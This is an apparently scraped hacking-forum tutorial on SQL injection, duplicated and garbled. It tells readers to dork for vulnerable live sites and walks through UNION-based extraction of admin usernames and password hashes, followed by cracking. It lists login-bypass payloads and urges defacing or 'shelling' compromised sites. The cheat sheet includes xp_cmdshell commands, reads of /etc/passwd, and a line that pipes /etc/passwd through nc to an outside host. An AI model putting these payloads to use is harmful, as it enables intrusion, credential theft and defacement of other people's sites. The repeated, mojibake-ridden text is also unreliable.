Now, we have seen few terms related to hacking and some methods to hack
passwords like phishing,keyloggers etc. Now we are moving a little forward.Now in this thread i m going to post something about SQL INJECTION. Its a type of hacking with the help of which we can hack sites (mostly the newly born sites and educational sites )
ok buddiez lets start and kindly pay attention.
THIS IS FOR EDUCATIONAL PURPOSE,I WILL NOT BE RESPONSIBLE FOR ANY HARM CAUSE BY YOU.
Here is the complete SQL injection tutorial for beginners step by step guide :
1). Search for a vulnerable site.
=======================
Highlight one then press ctrl+c then ctrl+v at google search engine.
allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
ĆĘĆ¢Ć¢Ć¢€Å”ƬƂƦand this one is just pricelessĆĘĆ¢Ć¢Ć¢€Å”ƬƂƦ
ĆĘĆ¢Ć¢Ć¢€Å”Ć¬Ć…Ć¢€Ålogin: *ĆĘĆ¢Ć¢Ć¢€Å”Ć¬Ć‚Ć ĆĘĆ¢Ć¢Ć¢€Å”Ć¬Ć…Ć¢€Åpassword= *ĆĘĆ¢Ć¢Ć¢€Å”Ć¬Ć‚Ć filetypels
2)Definitions:
==========
inurl: -> is a search parameter in google so that it searches for results in the site's url.
.php?5= -> is what i'm searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check it's vulnerability by adding magic qoute (') at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
3) So the url will be like this:
======================
http://www.site.com/news_archive.php?id=5'
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.
4) Find the columns :
===============
The next step is find out how many columns the database contain
To find it we use "order by" (without the qoute) and this string " -- " (no qoute).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
we move a little higher. (it doesn't matter)
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
this mean the database contain only 14 columns
5)Union select :
===========
Now use "-" (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
we hit enter.
numbers appears..
Like this:
6
, 5
8
6) Check MYSQL Version
====================
Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
6
, 5
5.1.32 <--this is the version
7) Getting Table Name.
=================
We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
were not done already: (don't hit enter)
between number 14 and this "--" (quote) insert this:
+from+information_schema.tables+whe
re+table_schema=database()--
it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()--
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhot o,active_sessions_split,auth_u ser_md5
8) Column Name :
=============
Now we're done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.
for better result we need to hex auth_user_md5.
Go to this Link: TRANSLATOR, BINARY
p
aste auth_user_md5 to the text box and click encode.
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) to group_concat(column_name).
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()--
replace also +from+information_schema.tables+where+table_schema =database()--
to
+from+information_schema.columns+where+table_name= 0x617574685f757365725f6d6435--
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_nam e=0x617574685f757365725f6d6435--
Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleNam e,LastName,Position,EmailAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModifi ed,ModifiedBy,Status
9) Main part :
===========
We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P
assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAd dress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a ,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0x6175 74685f757365725f6d6435-- to +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10)Cracking the password :
=====================
Because the password is in md5 hash we need to crack it.
Passwords recovery - MD5, SHA1, MySQL
pass
: x1R0zYB3bex
- See more at: http://www.hackatrick.com/2012/07/manual-sql-injection-tutorial.html#sthash.NaGAzxkj.dpuf
What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:
Code:
Username: admin
Password: ‘ or ‘1’=’1
When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query
PHP Code:
SELECT * FROM users
WHERE username = ‘admin’AND password = ‘ ‘ or ‘1’=’1’
In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we
Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial: http://www.hackforums.net/showthread.php?tid=2059771
In this tutorial, we can use these dorks:
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
If you want to find more dorks when using this method, you can find them here:
Code:
http://pastebin.com/ZjxpivV3
Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases
Code:
Username: admin
Password: ' or 0=0 --
Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Credits to RealSteal for some of the codes mentioned above.
Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.
Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website
Extras:
Common Password Queries:
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
If version of Database is greater than 5, then queries with UNION,group, @@version,orderby,benchmark etc can be executed
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;
SELECT cast(’123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
"select current_user;
select session_user;
"SELECT current_setting('data_directory');
select current_setting(’log_connections’);
select current_setting(’log_statement’);
"select current_setting(’port’);
select current_setting(’password_encryption’);
select current_setting(’krb_server_keyfile’);
"select current_setting(’virtual_host’);
select current_setting(’port’);
"select current_setting(’config_file’);
"select current_setting(’hba_file’);
"select current_setting(’data_directory’);
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb'
select dbmsinfo(’_version’);
select dbmsinfo(’session_user’);
select dbmsinfo(’system_user’);
select dbmsinfo(’database’);
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast(’123' as integer);
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer
waitfor delay '0:0:5'
Database Version lower than 5 i.e Version 4 cannot accept UNION version 5 type queries.
passwords like phishing,keyloggers etc. Now we are moving a little forward.Now in this thread i m going to post something about SQL INJECTION. Its a type of hacking with the help of which we can hack sites (mostly the newly born sites and educational sites )
ok buddiez lets start and kindly pay attention.
THIS IS FOR EDUCATIONAL PURPOSE,I WILL NOT BE RESPONSIBLE FOR ANY HARM CAUSE BY YOU.
Here is the complete SQL injection tutorial for beginners step by step guide :
1). Search for a vulnerable site.
=======================
Highlight one then press ctrl+c then ctrl+v at google search engine.
allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
ĆĘĆ¢Ć¢Ć¢€Å”ƬƂƦand this one is just pricelessĆĘĆ¢Ć¢Ć¢€Å”ƬƂƦ
ĆĘĆ¢Ć¢Ć¢€Å”Ć¬Ć…Ć¢€Ålogin: *ĆĘĆ¢Ć¢Ć¢€Å”Ć¬Ć‚Ć ĆĘĆ¢Ć¢Ć¢€Å”Ć¬Ć…Ć¢€Åpassword= *ĆĘĆ¢Ć¢Ć¢€Å”Ć¬Ć‚Ć filetypels
2)Definitions:
==========
inurl: -> is a search parameter in google so that it searches for results in the site's url.
.php?5= -> is what i'm searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check it's vulnerability by adding magic qoute (') at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
3) So the url will be like this:
======================
http://www.site.com/news_archive.php?id=5'
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.
4) Find the columns :
===============
The next step is find out how many columns the database contain
To find it we use "order by" (without the qoute) and this string " -- " (no qoute).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
we move a little higher. (it doesn't matter)
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
this mean the database contain only 14 columns
5)Union select :
===========
Now use "-" (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
we hit enter.
numbers appears..
Like this:
6
, 5
8
6) Check MYSQL Version
====================
Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
6
, 5
5.1.32 <--this is the version
7) Getting Table Name.
=================
We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
were not done already: (don't hit enter)
between number 14 and this "--" (quote) insert this:
+from+information_schema.tables+whe
re+table_schema=database()--
it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()--
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhot o,active_sessions_split,auth_u ser_md5
8) Column Name :
=============
Now we're done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.
for better result we need to hex auth_user_md5.
Go to this Link: TRANSLATOR, BINARY
p
aste auth_user_md5 to the text box and click encode.
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) to group_concat(column_name).
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()--
replace also +from+information_schema.tables+where+table_schema =database()--
to
+from+information_schema.columns+where+table_name= 0x617574685f757365725f6d6435--
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_nam e=0x617574685f757365725f6d6435--
Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleNam e,LastName,Position,EmailAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModifi ed,ModifiedBy,Status
9) Main part :
===========
We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P
assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAd dress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a ,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0x6175 74685f757365725f6d6435-- to +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10)Cracking the password :
=====================
Because the password is in md5 hash we need to crack it.
Passwords recovery - MD5, SHA1, MySQL
pass
: x1R0zYB3bex
- See more at: http://www.hackatrick.com/2012/07/manual-sql-injection-tutorial.html#sthash.NaGAzxkj.dpuf
What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:
Code:
Username: admin
Password: ‘ or ‘1’=’1
When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query
PHP Code:
SELECT * FROM users
WHERE username = ‘admin’AND password = ‘ ‘ or ‘1’=’1’
In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we
Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial: http://www.hackforums.net/showthread.php?tid=2059771
In this tutorial, we can use these dorks:
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
If you want to find more dorks when using this method, you can find them here:
Code:
http://pastebin.com/ZjxpivV3
Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases
Code:
Username: admin
Password: ' or 0=0 --
Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Credits to RealSteal for some of the codes mentioned above.
Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.
Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website
Extras:
Common Password Queries:
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
If version of Database is greater than 5, then queries with UNION,group, @@version,orderby,benchmark etc can be executed
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;
